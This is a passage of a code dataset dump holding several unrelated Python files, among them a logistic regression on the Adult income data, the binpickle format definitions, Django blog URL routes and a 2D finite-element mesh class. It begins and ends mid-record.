driver.quit()\r\n","sub_path":"yahoofinance_scraping.py","file_name":"yahoofinance_scraping.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"172065052","text":"# adult_ohe_logres.py\nimport pandas as pd \n\nfrom sklearn import linear_model\nfrom sklearn import preprocessing\nfrom sklearn import metrics\n\ndef run(fold):\n    # load the full training data with folds\n    df = pd.read_csv('../dataset/adult_folds.csv')\n\n    # list of numerical columns\n    num_cols = [\n        'fnlwgt' , \n        'age',\n        'capital.gain',\n        'capital.loss',\n        'hours.per.week'\n    ]\n\n    # drop numerical columns\n    df = df.drop(num_cols , axis = 1)\n\n    # map target to 0s and 1s\n    target_mapping = {\n        ' <=50K' : 0,\n        ' >50K' : 1\n    }\n\n    df.loc[:, 'income'] = df.income.map(target_mapping)\n\n    # all columns are features except income and kfold columns\n    features = [\n        f for f in df.columns if f not in ('income' , 'kfold')\n    ]\n\n    # fill all NaN values with NONE;\n    # all the features are categorical, so convert them to strings first\n    for col in features:\n        df.loc[:,col] = df[col].astype(str).fillna('NONE')\n\n    # getting training data using folds\n    df_train = df[df.kfold != fold].reset_index(drop = True)\n\n    # getting validation data using folds\n    df_valid = df[df.kfold == fold].reset_index(drop = True)\n\n    # initialize OneHotEncoder from sklearn\n    ohe = preprocessing.OneHotEncoder()\n\n    # fit ohe on training + validation features\n    full_data = pd.concat(\n        [df_train[features] , df_valid[features]] , \n        axis = 0\n    )\n    ohe.fit(full_data[features])\n\n    # transform training data\n    x_train = ohe.transform(df_train[features])\n\n    # transform validation data\n    x_valid = ohe.transform(df_valid[features])\n\n    # initialize Logistic Regression model\n    model = linear_model.LogisticRegression()\n\n    # fit model on training data set\n    model.fit(x_train , df_train.income.values)\n\n    # predict on validation dataset;\n    # we need probability values as we are calculating AUC,\n    # and we will use the probability of 1s\n    valid_preds = model.predict_proba(x_valid)[:,1]\n\n    # get roc auc score\n
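    # roc_auc_score is fed the positive-class probabilities computed above;\n    # ROC-AUC is defined over scores, not over hard 0/1 predictions\n    auc = metrics.roc_auc_score(df_valid.income.values 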
, valid_preds)\n\n    # print auc\n    print(f\"Fold = {fold} , AUC = {auc}\")\n\n\nif __name__ == \"__main__\":\n    for fold_ in range(5):\n        run(fold_)","sub_path":"src/adult_ohe_logres.py","file_name":"adult_ohe_logres.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"254242204","text":"\"\"\"\nConstants and functions defining the binpickle format.\n\"\"\"\n\nimport struct\nfrom typing import NamedTuple\n\nMAGIC = b'BPCK'\nVERSION = 1\nHEADER_FORMAT = struct.Struct('!4sHHq')\nTRAILER_FORMAT = struct.Struct('!QLL')\n\n\nclass FileHeader(NamedTuple):\n    \"\"\"\n    File header for a BinPickle file. The header is a 16-byte sequence containing the\n    magic (``BPCK``) followed by version and offset information:\n\n    1. File version (2 bytes, big-endian). Currently only version 1 exists.\n    2. Reserved (2 bytes). Set to 0.\n    3. File length (8 bytes, big-endian). Length is signed; if the file length is not known,\n       this field is set to -1.\n    \"\"\"\n    version: int = VERSION\n    \"The BinPickle format version.\"\n    length: int = -1\n    \"The length of the file (-1 for unknown).\"\n\n    def encode(self):\n        \"Encode the file header as bytes.\"\n        return HEADER_FORMAT.pack(MAGIC, self.version, 0, self.length)\n\n    @classmethod\n    def decode(cls, buf, *, verify=True):\n        \"Decode a file header from bytes.\"\n        m, v, pad, off = HEADER_FORMAT.unpack(buf)\n        if verify and m != MAGIC:\n            raise ValueError('invalid magic {}'.format(m))\n        if verify and v != VERSION:\n            raise ValueError('invalid version {}'.format(v))\n        if verify and pad != 0:\n            raise ValueError('invalid padding')\n        return cls(v, off)\n\n    @classmethod\n    def read(cls, file, **kwargs):\n        buf = file.read(HEADER_FORMAT.size)\n        return cls.decode(buf, **kwargs)\n\n    def trailer_pos(self):\n        \"Get the position of the start of the file trailer.\"\n        if self.length >= HEADER_FORMAT.size + TRAILER_FORMAT.size:\n            return self.length - TRAILER_FORMAT.size\n        elif self.length > 0:\n            raise ValueError('file size {} not enough for BinPickle'.format(self.length))\n        else:\n            return None  # We do not know the file size\n
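\n\n# Illustrative round-trip, using only the definitions above: the header is\n# always 16 bytes (HEADER_FORMAT.size), so for example\n#\n#     h = FileHeader(length=1024)\n#     buf = h.encode()              # 16 bytes, starts with b'BPCK'\n#     assert len(buf) == HEADER_FORMAT.size\n#     assert FileHeader.decode(buf) == h\n#\n\nclass FileTrailer(NamedTuple):\n    \"\"\"\n    File trailer for a BinPickle file. The trailer is a 16-byte sequence that tells the\n    reader where to find the rest of the binpickle data. It consists of the following\n    fields:\n\n    1. Index start (8 bytes, big-endian). Measured in bytes from the start of the file.\n    2. Index length (4 bytes, big-endian). The number of bytes in the index.\n    3. Index checksum (4 bytes, big-endian). 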
The Adler32 checksum of the index data.\n \"\"\"\n\n offset: int\n length: int\n checksum: int\n\n def encode(self):\n \"Encode the file trailer as bytes.\"\n return TRAILER_FORMAT.pack(self.offset, self.length, self.checksum)\n\n @classmethod\n def decode(cls, buf, *, verify=True):\n \"Decode a file trailer from bytes.\"\n o, l, c = TRAILER_FORMAT.unpack(buf)\n return cls(o, l, c)\n\n\nclass IndexEntry(NamedTuple):\n \"\"\"\n Index entry for a buffer in the BinPickle index.\n \"\"\"\n offset: int\n \"The position in the file where the buffer begins (bytes).\"\n enc_length: int\n \"The encoded length of the buffer data in bytes.\"\n dec_length: int\n \"The decoded length of the buffer in bytes.\"\n checksum: int\n \"The Adler-32 checksum of the encoded buffer data.\"\n codec: tuple = None\n \"The codec used to encode the buffer, or None.\"\n\n def to_repr(self):\n \"Convert an index entry to its MsgPack-compatible representation\"\n return dict((k, getattr(self, k)) for k in self._fields)\n\n @classmethod\n def from_repr(cls, repr):\n \"Convert an index entry from its MsgPack-compatible representation\"\n if not isinstance(repr, dict):\n raise TypeError(\"IndexEntry representation must be a dict\")\n return cls(**repr)\n","sub_path":"venv/lib/python3.7/site-packages/binpickle/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"272677905","text":"# a116_bugglength_image.plength\r\nimport turtle as trtl\r\n# instead of a descriptive name of the turtle such as painter,\r\n# a less useful variable name x is used\r\nspider = trtl.Turtle()\r\n# create spider body\r\nspider.pensize(40)\r\nspider.circle(20)\r\n# configure spider legs\r\nlegs = 4\r\nlength = 70\r\nangle = 375 / legs\r\nspider.pensize(5)\r\n# draw spider legs\r\nn = 0\r\nwhile (n < legs):\r\n spider.goto(0,20)\r\n spider.setheading(angle*n)\r\n spider.circle(50,80)\r\n spider.circle(50,-80)\r\n n = n + 1\r\nfor x in range(4):\r\n spider.goto(0,20)\r\n spider.left(20)\r\n spider.setheading(angle*n)\r\n spider.circle(-50,80)\r\n spider.circle(-50,-80)\r\n\r\nspider.backward(length)\r\nspider.right(20)\r\nspider.forward(50)\r\nspider.begin_fill()\r\nspider.circle(20)\r\nspider.end_fill()\r\nspider.hideturtle()\r\nlegsn = trtl.Screen()\r\nlegsn.mainloop()","sub_path":"KirkJ/Unit 1/1_1/1.15/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"546656044","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\n\ndef plotData1DHelper(X, y):\n plt.clf()\n plt.title(\"Univariate Data\")\n plt.xlabel(\"X\")\n plt.ylabel(\"y\")\n plt.plot(X, y, 'rx', label='Training Data')\n\n\ndef plotData1D(X, y):\n '''\n This function is to plot y vs X where the number of predictors of X is 1.\n Input\n X - n*1 matrix or vector of length n\n y - n*1 matrix or vector of length n\n to_block - boolean flag which when set stops the program execution until the\n plot is closed\n '''\n plotData1DHelper(X, y)\n plt.show()\n\n\ndef plotRegLine1D( lr_model, X, y):\n '''\n Plots the y vs X and also the regressed line according to the theta computed.\n Input\n X - n*2 matrix or vector of length n ( the second dimension is a column of ones for the bias term)\n y - n*1 matrix or 
vector of length n\n lr_model - linear regression trained model\n '''\n plotData1DHelper(X[:,1], y)\n plt.plot(X[:,1],X*lr_model.theta,'b-', label='Regression Line')\n plt.legend(loc='lower right')\n plt.show()\n\n\ndef visualizeObjective(lr_model,t1_vals,t2_vals, X, y):\n '''\n The function does the surface plot of the objective for a\n univariate regression problem with a bias term, so over 2 parameters.\n Search over the space of theta1, theta2.\n\n It also plots the gradient descent steps as blue points on the surface plot.\n Finally it plots a contour plot of the same\n\n lr_model - object of class LinReg (already trained)\n t1_vals, t2_vals - values over which the objective function should be plotted\n List of numbers\n X - n*2 matrix or vector of length n ( the second dimension is a column of ones for the bias term)\n y - n*1 matrix or vector of length n\n '''\n T1,T2 = np.meshgrid(t1_vals, t2_vals)\n n,p = T1.shape\n\n # Compute the objective function over the space\n Z = np.zeros(T1.shape)\n for i in range(n):\n for j in range(p):\n Z[i,j] = lr_model.computeCost(X,y, np.matrix([T1[i,j],T2[i,j]]).T )\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n surf = ax.plot_surface(T1, T2, Z, rstride=1, cstride=1, cmap=cm.coolwarm,\n linewidth=0)\n\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n # If the history of the objective function plot the path taken by the gradient descent\n if lr_model.JHist !=None:\n\n for ii in range(len(lr_model.JHist)-1):\n t1 = lr_model.JHist[ii][1].tolist()\n t2 = lr_model.JHist[ii+1][1].tolist()\n\n J1 = lr_model.JHist[ii][0]\n J2 = lr_model.JHist[ii+1][0]\n J1 = np.squeeze(np.array(J1))\n J2 = np.squeeze(np.array(J2))\n\n x_pts = [t1[0][0], t2[0][0]]\n y_pts = [t1[1][0], t2[1][0]]\n J_pts = [J1, J2]\n ax.plot3D(x_pts, y_pts, J_pts, 'b-')\n\n for J, t in lr_model.JHist:\n J = [np.squeeze(np.array(J))]\n t0 = [np.squeeze(np.array(t[0][0]))]\n t1 = [np.squeeze(np.array(t[1][0]))]\n ax.plot3D(t0, t1, J, 'mo')\n\n plt.title('Surface plot of the cost function')\n plt.xlabel('Theta0')\n plt.ylabel('Theta1')\n plt.show()\n\n # Contour plot\n plt.figure()\n plt.clf()\n CS = plt.contour(T1, T2, Z)\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Contours of cost function')\n plt.xlabel(\"Theta0\")\n plt.ylabel(\"Theta1\")\n\n plt.plot(lr_model.theta[0][0],lr_model.theta[1][0], 'rx')\n plt.show()\n","sub_path":"plot_functions.py","file_name":"plot_functions.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"190431029","text":"class Solution:\r\n # @param {integer[]} nums\r\n # @return {integer}\r\n def maxProduct(self, nums):\r\n minv, maxv = 1, 1\r\n ret = nums[0]\r\n for n in nums:\r\n minv, maxv = min(n, maxv*n, minv*n), max(n, maxv*n, minv*n)\r\n ret = max(ret, maxv)\r\n return ret\r\n","sub_path":"MaximumProductSubarray.py","file_name":"MaximumProductSubarray.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"159831338","text":"\"\"\"myblog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom blog import views\nimport settings\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$',views.getIndexPage,name='Index'),\n #Specific pages get Function\n url(r'^Teclogy/$',views.getTeclogyArticle,name='TeclogyIndex'),\n url(r'^Life/$',views.getLifeArticle,name='LifeIndex'),\n\n url(r'^About/$',views.getPageByAbout,name='AboutPage'),\n url(r'^Job/$',views.getPageByJob,name='JobPage'),\n #Comment Submit Handler\n url(r'^SubmitComment/$',views.sendCommentToServer,name='CommentHanddler'),\n\n #Article Handlers\n url(r'^(?P[a-zA-Z]*)/$',views.getArticleByLable,name='GetArticleByLable'),\n url(r'^(?P[a-zA-Z]*)/(?P[\\d]*)/$',views.getArticleById,name='GetArticleById'),\n #now from zero\n url(r'^(?P[a-zA-Z]*)/(?P[\\d]*)/(?P[\\d]*)/?$',views.getArticleByPage,name='GetArticleByPage'),\n\n url(r'^Update/Display/(?P[\\d]*)/$',views.getUpdateList,name='GetUpdateList'),\n url(r'^GetByPages',views.pageArticleSendHanddler,name='PageHanddler'),\n url(r'^UploadImag3',views.ArticleImageUpload,name='ImageUpload'),\n]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"296644487","text":"## =================================================================== ##\n# this is file Model.py, created at 23-May-2013 #\n# maintained by Gustavo Rabello dos Anjos #\n# e-mail: gustavo.rabello@gmail.com #\n## =================================================================== ##\n\nimport numpy as np\nimport geometry\n\nclass Mesh:\n def __init__(_self,_boundary=None):\n \"\"\"\n Class Mesh\n \"\"\"\n _self.boundary = _boundary\n _self.numVerts = 0\n _self.numNodes = 0\n _self.numElems = 0\n _self.X = 0\n _self.Y = 0\n _self.IEN = 0\n _self.numberOfBoundaries = 0\n _self.physicalName = 0\n _self.heaviside = []\n _self.vertPhysicalName = []\n _self.elemPhysicalName = []\n _self.vertIdRegion = 0\n _self.elemIdRegion = 0\n _self.heaviside = 0\n _self.surface = 0\n _self.neighborElem = [[]]\n _self.neighborVert = [[]]\n _self.minEdge = 0\n _self.maxEdge = 0\n _self.averageEdgeLength = 0\n _self.numEdges = 0\n _self.mapEdge = 0\n _self.oface = 0\n _self.minArea = []\n _self.idMinArea = []\n _self.maxArea = []\n _self.idMaxArea = []\n _self.sumArea = []\n _self.averageTriArea = []\n\n def readVTK(_self,_dir,_filename):\n \"\"\"Read .VTK file created from any mesh generator. Assign values to\n X,Y,IEN numpy arrays.\n Ex. 
readVTK('/home/user/dir/','retangle.vtk')\"\"\"\n vtkFile = open(_dir+_filename,'r')\n lines = vtkFile.readlines()\n\n lineNr = 0\n while \"POINTS\" not in lines[lineNr]:\n lineNr += 1\n\n _self.numVerts = int(lines[lineNr].split()[1])\n lineNr += 1\n\n _self.X = np.zeros((_self.numVerts,1),dtype=float)\n _self.Y = np.zeros((_self.numVerts,1),dtype=float)\n\n for line in range(0,_self.numVerts):\n coords = lines[lineNr].split()\n _self.X[line] = float(coords[0])\n _self.Y[line] = float(coords[1])\n lineNr += 1\n\n while \"CELLS\" not in lines[lineNr]:\n lineNr += 1\n\n _self.numElems = int(lines[lineNr].split()[1])\n lineNr += 1\n\n _self.IEN = np.zeros((_self.numElems,3),dtype=int)\n\n for line in range(0,_self.numElems):\n vertices = lines[lineNr].split()\n v1 = int(vertices[1])\n v2 = int(vertices[2])\n v3 = int(vertices[3])\n _self.IEN[line] = [v1,v2,v3]\n lineNr += 1\n\n def readMSH(_self,_dir,_filename):\n \"\"\"Read .MSH file created from GMsh and assign values to\n X,Y,IEN numpy arrays.\n Ex. readMSH('/home/user/gmsh/','retangle.msh')\"\"\"\n mshFile = open(_dir+_filename,'r')\n lines = mshFile.readlines()\n\n lineNr = 0\n while \"$PhysicalNames\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n _self.numberOfBoundaries = int(lines[lineNr])\n\n lineNr += 1\n _self.physicalName = [[] for i in range(_self.numberOfBoundaries)]\n for line in range(0,_self.numberOfBoundaries):\n aux = lines[lineNr].split()\n _self.physicalName[line] = aux[2]\n lineNr += 1\n\n while \"$Nodes\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n _self.numVerts = int(lines[lineNr])\n\n _self.X = np.zeros((_self.numVerts,1),dtype=float)\n _self.Y = np.zeros((_self.numVerts,1),dtype=float)\n\n lineNr += 1\n for line in range(0,_self.numVerts):\n coords = lines[lineNr].split()\n _self.X[line] = float(coords[1])\n _self.Y[line] = float(coords[2])\n lineNr += 1\n\n while \"$Elements\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n totalNumElems = int(lines[lineNr])\n\n count = 0\n lineNr += 1\n while len( lines[lineNr].split() ) == 7:\n count += 1\n lineNr += 1\n\n _self.numElems = totalNumElems-count\n _self.IEN = np.zeros((_self.numElems,3),dtype=int)\n\n _self.elemIdRegion = np.zeros((_self.numElems,1),dtype=int)\n _self.elemPhysicalName = [[] for i in range(_self.numElems)]\n _self.vertIdRegion = np.zeros((_self.numVerts,1),dtype=int)\n\n for line in range(0,_self.numElems):\n vertices = lines[lineNr].split()\n v1 = int(vertices[5])-1\n v2 = int(vertices[6])-1\n v3 = int(vertices[7])-1\n _self.IEN[line] = [v1,v2,v3]\n\n lineNr += 1\n\n def mesh1Dto2D(_self,_param):\n import meshpy.triangle as tri\n\n mesh_info = tri.MeshInfo()\n mesh_info = _self.convertNumPyToTriangle(mesh_info)\n\n if _param[0] is 'Q': _param[0] = False \n else: _param[0] = True\n if _param[1] is 'A': _param[1] = True \n else: _param[1] = False\n if _param[3] is \"YY\": _param[3] = False \n else: _param[3] = True\n if _param[4] is \"q\": _param[4] = True\n else: _param[4] = False\n trimesh = tri.build(mesh_info, verbose=_param[0], \n attributes=_param[1],\n max_volume=float(_param[2]),\n allow_boundary_steiner=_param[3],\n allow_volume_steiner=_param[3], \n quality_meshing=_param[4])\n\n _self.convertTriangleToNumPy(trimesh)\n\n def convertTriangleToNumPy(_self,_trimesh):\n _self.numVerts = len(_trimesh.points)\n _self.numElems = len(_trimesh.elements)\n _self.numNodes = 0\n\n _self.IEN = np.array(_trimesh.elements)\n _self.elemIdRegion= np.zeros((_self.numElems,1),dtype=float)\n _self.vertIdRegion= 
np.zeros((_self.numVerts,1),dtype=float)\n _self.heaviside = np.zeros((_self.numVerts,1),dtype=float)\n for i,t in enumerate(_trimesh.elements): \n _self.elemIdRegion[i] = _trimesh.element_attributes[i]\n for j in range(0,len(t)):\n vertex = int(t[j])\n _self.vertIdRegion[vertex] = _trimesh.element_attributes[i]\n if _trimesh.element_attributes[i] == 0.0:\n _self.heaviside[vertex] = 0.0\n else:\n _self.heaviside[vertex] = 1.0\n\n coords = np.array(_trimesh.points)\n _self.X = np.array(coords[:,0])\n _self.Y = np.array(coords[:,1])\n for i,t in enumerate(_trimesh.points):\n if _trimesh.point_markers[i] == 22:\n _self.heaviside[i] = 0.5\n _self.vertIdRegion[i] = 0.5\n\n def convertNumPyToTriangle(_self,_mesh_info):\n mesh_info = _mesh_info\n\n # coords\n _self.X = _self.boundary.X.reshape(1,_self.boundary.numVerts)\n _self.Y = _self.boundary.Y.reshape(1,_self.boundary.numVerts)\n coords = np.zeros((_self.boundary.numVerts,2),dtype=float)\n coords[:,0] = _self.X\n coords[:,1] = _self.Y\n\n # point markers\n point_markers = [[] for i in range(_self.boundary.numVerts)]\n for i in range(0,_self.boundary.numVerts):\n if _self.boundary.Marker[i] == 0.0:\n point_markers[i] = 11\n elif _self.boundary.Marker[i] == 0.5:\n point_markers[i] = 22\n\n # defining bubble's surface and convex-hull\n facet_markers = [[] for i in range(_self.boundary.numElems)]\n face_markers = [[] for i in range(_self.boundary.numElems)]\n for i in range(0,_self.boundary.numElems):\n v1 = _self.boundary.IEN[i][0]\n v2 = _self.boundary.IEN[i][1]\n if (_self.boundary.Marker[v1] + _self.boundary.Marker[v2]) > 0:\n facet_markers[i] = 10\n else:\n facet_markers[i] = 20\n \n # import to mesh_info structure\n mesh_info.set_points(coords,point_markers)\n mesh_info.set_facets(_self.boundary.IEN,facet_markers)\n\n # out and in regions of bubble(s)\n # lineMesh.elemIdRegion == 0 --> wall\n # lineMesh.elemIdRegion == 1 --> bubble 1\n # lineMesh.elemIdRegion == 2 --> bubble 2 , etc\n mesh_info.regions.resize(_self.boundary.elemIdRegion.max()+1)\n for nb in range(0,_self.boundary.elemIdRegion.max()+1):\n for i in range(0,_self.boundary.numVerts):\n myList = _self.boundary.getNeighborPoint(i)\n myVec = _self.boundary.getNormalAndKappa(i,myList)\n curv = abs(myVec[0])\n if _self.boundary.vertIdRegion[i] == nb and curv < 20:\n xp = _self.boundary.X[i]\n yp = _self.boundary.Y[i]\n xNormal = myVec[1]\n yNormal = myVec[2]\n break\n mesh_info.regions[nb] = [ xp[0]-0.1*xNormal[0],\n yp[0]-0.1*yNormal[0],\n nb,\n 0.1 ]\n return mesh_info\n\n def setMiniElement(_self):\n \"\"\"Set mini element to X,Y and IEN arrays. The mini element consists in the\n same X,Y,IEN struct with an additional centroid. Therefore X,Y and IEN should\n be resized to accomadate the centroid coordinate.\n \"\"\"\n _self.numNodes = _self.numVerts + _self.numElems\n\n _self.X.resize(_self.numNodes,refcheck=False)\n _self.Y.resize(_self.numNodes,refcheck=False)\n _self.IEN = np.hstack((_self.IEN, np.zeros((_self.IEN.shape[0], 1), \\\n dtype=_self.IEN.dtype)))\n\n for i in range(0,_self.numElems):\n v1 = _self.IEN[i][0]\n v2 = _self.IEN[i][1]\n v3 = _self.IEN[i][2]\n\n vAdd = _self.numVerts + i\n\n pos = _self.IEN.shape[1]-1\n _self.IEN[i][pos] = vAdd\n centroid = geometry.getCentroid(_self.X[v1],_self.Y[v1],\n _self.X[v2],_self.Y[v2],\n _self.X[v3],_self.Y[v3] )\n\n _self.X[vAdd] = centroid[0]\n _self.Y[vAdd] = centroid[1]\n\n def setQuadElement(_self):\n \"\"\"Set quad element to X,Y and IEN arrays. 
The quad element consists of the\n        same X,Y,IEN struct with additional edge nodes. Therefore X,Y and IEN should\n        be resized to accommodate the 3 additional coordinates.\n\n        INCOMPLETE!\n\n        \"\"\"\n        _self.numNodes = _self.numVerts + _self.numEdges\n\n        _self.X.resize(_self.numNodes,refcheck=False)\n        _self.Y.resize(_self.numNodes,refcheck=False)\n        _self.IEN = np.hstack((_self.IEN, np.zeros((_self.IEN.shape[0], 1), \\\n                    dtype=_self.IEN.dtype)))\n\n        for i in range(0,_self.numEdges):\n            edge = _self.mapEdge[i][0]\n            xc = _self.mapEdge[i][1]\n            yc = _self.mapEdge[i][2]\n            v1 = _self.mapEdge[i][3]\n            v2 = _self.mapEdge[i][4]\n\n    def setNeighbor(_self):\n        _self.neighborElem = [[] for i in range(_self.numVerts)]\n        for i in range(0,_self.numElems):\n            for j in range(0,3):\n                v = _self.IEN[i][j] \n                _self.neighborElem[v].append(i)\n\n    def setNeighborVert(_self):\n        \"\"\"\n        Method to create the neighbor vertices array for all 2D nodes.\n        \"\"\"\n        _self.neighborVert = [[] for i in range(_self.numVerts)]\n\n        for i in range(0,_self.numVerts):\n            elemList = _self.neighborElem[i]\n            # iterate over the neighbor elements themselves, not over a range\n            for elem in elemList:\n                for j in range(0,3):\n                    v = _self.IEN[elem][j]\n                    _self.neighborVert[i].append(v)\n\n            # delete i vertex at neighborVert[i]\n            # MISSING METHOD\n\n            # sort and unique at neighborVert[i]\n            _self.neighborVert[i] = np.unique(_self.neighborVert[i])\n\n\n    def setMapping(_self):\n        \"\"\" Method to create two important mapping arrays: oFace and mapEdge\n        This method also sets minEdge, maxEdge and averageEdgeLength\n        \"\"\"\n\n        edges = np.zeros((_self.numElems*3,4),dtype=int)\n        _self.oface = -1*np.ones((_self.numElems,3),dtype=int)\n        _self.boundary.boundaryVert = []\n\n        for elem in range(0,_self.numElems):\n            v1 = _self.IEN[elem][0]\n            v2 = _self.IEN[elem][1]\n            v3 = _self.IEN[elem][2]\n\n            # 1st. edge\n            edge1 = [v1,v2] # edge\n            edge1.sort()\n            edge1.append(elem) # elem\n            edge1.append(2) # ID of v3\n            edges[3*elem+0] = edge1\n\n            # 2nd. edge\n            edge2 = [v2,v3] # edge\n            edge2.sort()\n            edge2.append(elem) # elem\n            edge2.append(0) # ID of v1\n            edges[3*elem+1] = edge2\n\n            # 3rd. edge\n
            edge3 = [v3,v1] # edge\n            edge3.sort()\n            edge3.append(elem) # elem\n            edge3.append(1) # ID of v2\n            edges[3*elem+2] = edge3\n\n        # sort 2nd column and 1st column (still duplicated)\n        edgesSorted = edges[np.lexsort((edges[:, 1], edges[:, 0]))]\n\n        # add row (test)\n        #edgesSorted = np.vstack([edgesSorted,[2,3,4,0]])\n\n        i = 0\n        while i < len(edgesSorted)-1:\n            if edgesSorted[i][0] == edgesSorted[i+1][0] and \\\n               edgesSorted[i][1] == edgesSorted[i+1][1]:\n                #print 'TRUE'\n                _self.oface[edgesSorted[i][2]][edgesSorted[i][3]] = edgesSorted[i+1][2]\n                _self.oface[edgesSorted[i+1][2]][edgesSorted[i+1][3]] = edgesSorted[i][2]\n                edgesSorted = np.delete(edgesSorted, i+1, 0)\n                i += 1\n            else:\n                #print 'FALSE'\n                _self.boundary.boundaryVert.append(edgesSorted[i][0])\n                _self.boundary.boundaryVert.append(edgesSorted[i][1])\n                i += 1\n\n            if i == len(edgesSorted)-1:\n                _self.boundary.boundaryVert.append(edgesSorted[i][0])\n                _self.boundary.boundaryVert.append(edgesSorted[i][1])\n\n        # sort and unique vector\n        _self.boundary.boundaryVert = np.unique(_self.boundary.boundaryVert)\n\n        _self.minEdge = 1E10;\n        _self.maxEdge = -1E10;\n        _self.mapEdge = np.zeros((len(edgesSorted),5),dtype=float)\n        _self.numEdges = 0\n        for i in range( 0,len(edgesSorted) ):\n            x1 = _self.X[ edgesSorted[i][0] ]\n            y1 = _self.Y[ edgesSorted[i][0] ]\n            x2 = _self.X[ edgesSorted[i][1] ]\n            y2 = _self.Y[ edgesSorted[i][1] ]\n\n            xMid = (x1+x2)*0.5\n            yMid = (y1+y2)*0.5\n            length = geometry.vectorLength(x1-x2,y1-y2)\n\n            _self.averageEdgeLength += length\n\n            if( length < _self.minEdge ):\n                _self.minEdge = length;\n\n            if( length > _self.maxEdge ):\n                _self.maxEdge = length;\n\n            _self.mapEdge[_self.numEdges][0] = _self.numVerts+_self.numEdges\n            _self.mapEdge[_self.numEdges][1] = xMid\n            _self.mapEdge[_self.numEdges][2] = yMid\n            _self.mapEdge[_self.numEdges][3] = edgesSorted[i][0] \n            _self.mapEdge[_self.numEdges][4] = edgesSorted[i][1] \n            _self.numEdges += 1\n\n        # average of edge lengths by total number of edges\n        _self.averageEdgeLength = _self.averageEdgeLength/_self.numEdges\n\n    def stats(_self):\n        \"\"\"\n        regular    a^2 \n        tri    = -----\n        area       2\n        \"\"\"\n        _self.minArea = [1E10]*(_self.elemIdRegion.max()+1)\n        _self.idMinArea = [0]*(_self.elemIdRegion.max()+1)\n        _self.maxArea = [-1E10]*(_self.elemIdRegion.max()+1)\n        _self.idMaxArea = [0]*(_self.elemIdRegion.max()+1)\n        _self.sumArea = [0]*(_self.elemIdRegion.max()+1)\n        _self.averageTriArea = [0]*(_self.elemIdRegion.max()+1)\n        _self.intri = [0]*(_self.elemIdRegion.max()+1)\n\n        count = [0]*(_self.elemIdRegion.max()+1)\n        for e in range(0,_self.numElems):\n            v1 = _self.IEN[e][0]\n            p1x = _self.X[v1] \n            p1y = _self.Y[v1] \n\n            v2 = _self.IEN[e][1]\n            p2x = _self.X[v2] \n            p2y = _self.Y[v2] \n\n            v3 = _self.IEN[e][2]\n            p3x = _self.X[v3] \n            p3y = _self.Y[v3] \n\n            elemID = _self.elemIdRegion[e]\n            area = geometry.getArea(p1x,p1y,p2x,p2y,p3x,p3y)\n\n            # intri number\n            if _self.heaviside[v1] == 0.5 and \\\n               _self.heaviside[v2] == 0.5 and \\\n               _self.heaviside[v3] == 0.5:\n                _self.intri[elemID] += 1;\n\n            _self.sumArea[elemID] += area\n\n            # areas\n            if area < _self.minArea[elemID]:\n                _self.minArea[elemID] = area\n                _self.idMinArea[elemID] = e\n            if area > _self.maxArea[elemID]:\n                _self.maxArea[elemID] = area\n                _self.idMaxArea[elemID] = e\n            count[elemID] += 1\n\n        for nb in range(0,_self.elemIdRegion.max()+1):\n            _self.averageTriArea[nb] = _self.sumArea[nb]/count[nb]\n\n    def setCloser(_self):\n
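        # brute-force closest-point search: each mesh node is tested against\n        # every boundary-surface node, hence the warning below\n        nverts = len(_self.boundary.surface)\n        xSurface = np.zeros((nverts,1),dtype=float)\n        ySurface = np.zeros((nverts,1),dtype=float)\n        for i in range(0,nverts):\n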
